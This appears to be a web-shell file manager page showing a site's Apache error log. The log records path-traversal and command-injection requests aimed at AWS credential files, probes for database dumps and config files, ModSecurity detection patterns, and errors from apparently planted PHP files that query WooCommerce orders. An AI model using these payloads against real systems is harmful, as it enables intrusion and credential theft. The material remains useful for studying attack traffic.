⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
cms.dev-unit.com.error.log
[Wed Jun 04 23:28:53.470799 2025] [authz_core:error] [pid 7206:tid 140249992779520] [client 139.59.143.102:51138] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:53.877959 2025] [:error] [pid 7240:tid 140250111796992] [client 139.59.143.102:51220] File does not exist: /home/id/cms.dev-unit.com/info.php [Wed Jun 04 23:28:55.103856 2025] [authz_core:error] [pid 7240:tid 140250001172224] [client 139.59.136.184:60382] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:55.673968 2025] [:error] [pid 7239:tid 140249892067072] [client 139.59.136.184:60476] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 03:35:00.206105 2025] [:error] [pid 21091:tid 139942827083520] [client 5.62.57.46:1223] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 03:35:02.885269 2025] [:error] [pid 21093:tid 139942860654336] [client 5.62.57.46:1358] File does not exist: /home/id/cms.dev-unit.com/test.php [Fri Jun 06 03:35:14.261880 2025] [:error] [pid 11111:tid 139942885832448] [client 5.62.57.46:1334] File does not exist: /home/id/cms.dev-unit.com/index.php [Fri Jun 06 08:46:44.862270 2025] [:error] [pid 28114:tid 139905246152448] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/login_up.php [Fri Jun 06 08:46:46.155869 2025] [:error] [pid 28114:tid 139905078298368] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/pms"] [unique_id "aEKAxulGAz3AdDlN_29zPAAAAJc"] [Fri Jun 06 08:46:53.524511 2025] [:error] [pid 28114:tid 139905086691072] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aEKAzelGAz3AdDlN_29zQgAAAJY"] [Fri Jun 06 08:46:56.495034 2025] [:error] [pid 28114:tid 139905195796224] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0OlGAz3AdDlN_29zRQAAAIk"] [Fri Jun 06 08:46:58.670042 2025] [:error] [pid 28114:tid 139905153832704] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0ulGAz3AdDlN_29zRwAAAI4"] [Fri Jun 06 08:47:01.611118 2025] [:error] [pid 28114:tid 139905128654592] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/ajax_dashboard.php"] [unique_id "aEKA1elGAz3AdDlN_29zSQAAAJE"] [Fri Jun 06 08:47:03.063570 2025] [:error] [pid 28114:tid 139905095083776] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/remote/fgt_lang"] [unique_id "aEKA1-lGAz3AdDlN_29zSgAAAJU"] [Fri Jun 06 08:47:08.464383 2025] [:error] [pid 28114:tid 139905137047296] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php/core/preview"] [unique_id "aEKA3OlGAz3AdDlN_29zTgAAAJA"] [Fri Jun 06 08:47:57.684499 2025] [:error] [pid 28114:tid 139905162225408] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 08:47:58.907253 2025] [:error] [pid 28114:tid 139905271330560] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 09:58:38.744863 2025] [:error] [pid 28204:tid 139905179010816] [client 213.232.87.230:44245] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aEKRnuwVtsTIuRogMJaFUAAAAMs"] [Fri Jun 06 09:58:38.906139 2025] [:error] [pid 28114:tid 139905153832704] [client 213.232.87.230:3199] File does not exist: /home/id/cms.dev-unit.com/wp-config.php [Fri Jun 06 09:58:38.973876 2025] [:error] [pid 28204:tid 139905195796224] [client 213.232.87.230:54525] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 09:58:38.996114 2025] [:error] [pid 28113:tid 139905220974336] [client 213.232.87.230:46125] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aEKRnusVXzdnbs2OP1eStwAAAEY"] [Fri Jun 06 09:58:39.073548 2025] [:error] [pid 28112:tid 139905103476480] [client 213.232.87.230:31393] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aEKRnwkSknyQfMO4nOyhDAAAABQ"] [Fri Jun 06 09:58:39.129057 2025] [:error] [pid 28114:tid 139905220974336] [client 213.232.87.230:56021] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aEKRn-lGAz3AdDlN_2933wAAAIY"] [Fri Jun 06 09:58:39.151775 2025] [:error] [pid 28204:tid 139905246152448] [client 213.232.87.230:19813] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWAAAAMM"] [Fri Jun 06 09:58:39.861783 2025] [:error] [pid 28113:tid 139905204188928] [client 213.232.87.230:25409] File does not exist: /home/id/cms.dev-unit.com/config.php [Fri Jun 06 09:58:39.868856 2025] [:error] [pid 28204:tid 139905162225408] [client 213.232.87.230:19023] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWwAAAM0"] [Fri Jun 06 09:58:39.871234 2025] [:error] [pid 28114:tid 139905128654592] [client 213.232.87.230:48589] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aEKRn-lGAz3AdDlN_2934QAAAJE"] [Fri Jun 06 09:58:39.873837 2025] [authz_host:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Fri Jun 06 09:58:39.873850 2025] [authz_core:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Jun 06 13:29:32.111667 2025] [:error] [pid 28113:tid 139905195796224] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 13:29:32.124157 2025] [:error] [pid 28113:tid 139905220974336] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/info.php [Sat Jun 07 16:10:01.741295 2025] [autoindex:error] [pid 29528:tid 140460420998912] [client 197.58.199.72:58083] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:10:32.173327 2025] [autoindex:error] [pid 15719:tid 140460547733248] [client 197.58.199.72:58100] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:16:48.449528 2025] [access_compat:error] [pid 15718:tid 140460379035392] [client 197.58.199.72:58123] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:20:22.912446 2025] [access_compat:error] [pid 15720:tid 140460328679168] [client 197.58.199.72:58143] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:22:35.972044 2025] [access_compat:error] [pid 15719:tid 140460437784320] [client 197.58.199.72:58152] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Sat Jun 07 16:45:19.342182 2025] [access_compat:error] [pid 15806:tid 140460437784320] [client 197.58.199.72:58259] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Tue Jun 10 05:22:14.609434 2025] [autoindex:error] [pid 15289:tid 140121730922240] [client 197.58.226.17:49782] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/installer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 15 02:01:57.453570 2025] [core:error] [pid 17099:tid 140038650115840] [client 54.212.177.106:54946] Script timed out before returning headers: index.php [Thu Jul 31 14:57:28.015476 2025] [:error] [pid 5230:tid 140191247279872] [client 198.144.182.13:41846] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Aug 03 00:54:05.192017 2025] [authz_core:error] [pid 29714:tid 140178358925056] [client 134.122.28.88:58440] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Mon Aug 11 21:41:58.841927 2025] [:error] [pid 1279:tid 1312] [client 198.144.182.13:38140] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Aug 12 07:14:49.485511 2025] [:error] [pid 28779:tid 28792] [client 198.144.182.13:49786] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 12:21:08.146520 2025] [:error] [pid 12142:tid 12154] [client 198.144.182.13:40564] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Aug 30 17:33:46.277953 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Could not write to logfile: [Sat Aug 30 17:33:46.277995 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Printing message to stderr: [Sat Aug 30 17:33:46.278071 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 17:33:46 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 17:33:46.278075 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 19:17:48.840925 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Could not write to logfile: [Sat Aug 30 19:17:48.840970 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Printing message to stderr: [Sat Aug 30 19:17:48.841047 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:48 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 19:17:48.841052 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:49.778152 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Could not write to logfile:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778198 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Printing message to stderr:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778274 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] [Sat Aug 30 19:17:49 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778279 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] , referer: https://cms.dev-unit.com/ [Tue Sep 09 20:43:09.023884 2025] [:error] [pid 4731:tid 4778] [client 4.217.236.50:4497] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Sep 16 02:38:59.151480 2025] [core:error] [pid 14350:tid 14364] [client 45.148.10.248:35178] Script timed out before returning headers: index.php [Tue Sep 16 02:38:59.170417 2025] [core:error] [pid 18995:tid 19069] [client 45.148.10.248:40868] Script timed out before returning headers: index.php [Sat Sep 20 10:51:08.852018 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 10:51:08.852213 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852337 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852432 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 10:51:08.852446 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] Stack trace:, referer: https://www.google.com [Sat Sep 20 10:51:08.852493 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 10:51:08.852503 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #1 {main}, referer: https://www.google.com [Sat Sep 20 10:51:08.852554 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Sat Sep 20 16:49:36.233246 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 16:49:36.233437 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233562 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233653 2025] [:error] [pid 13751:tid 13798] [client 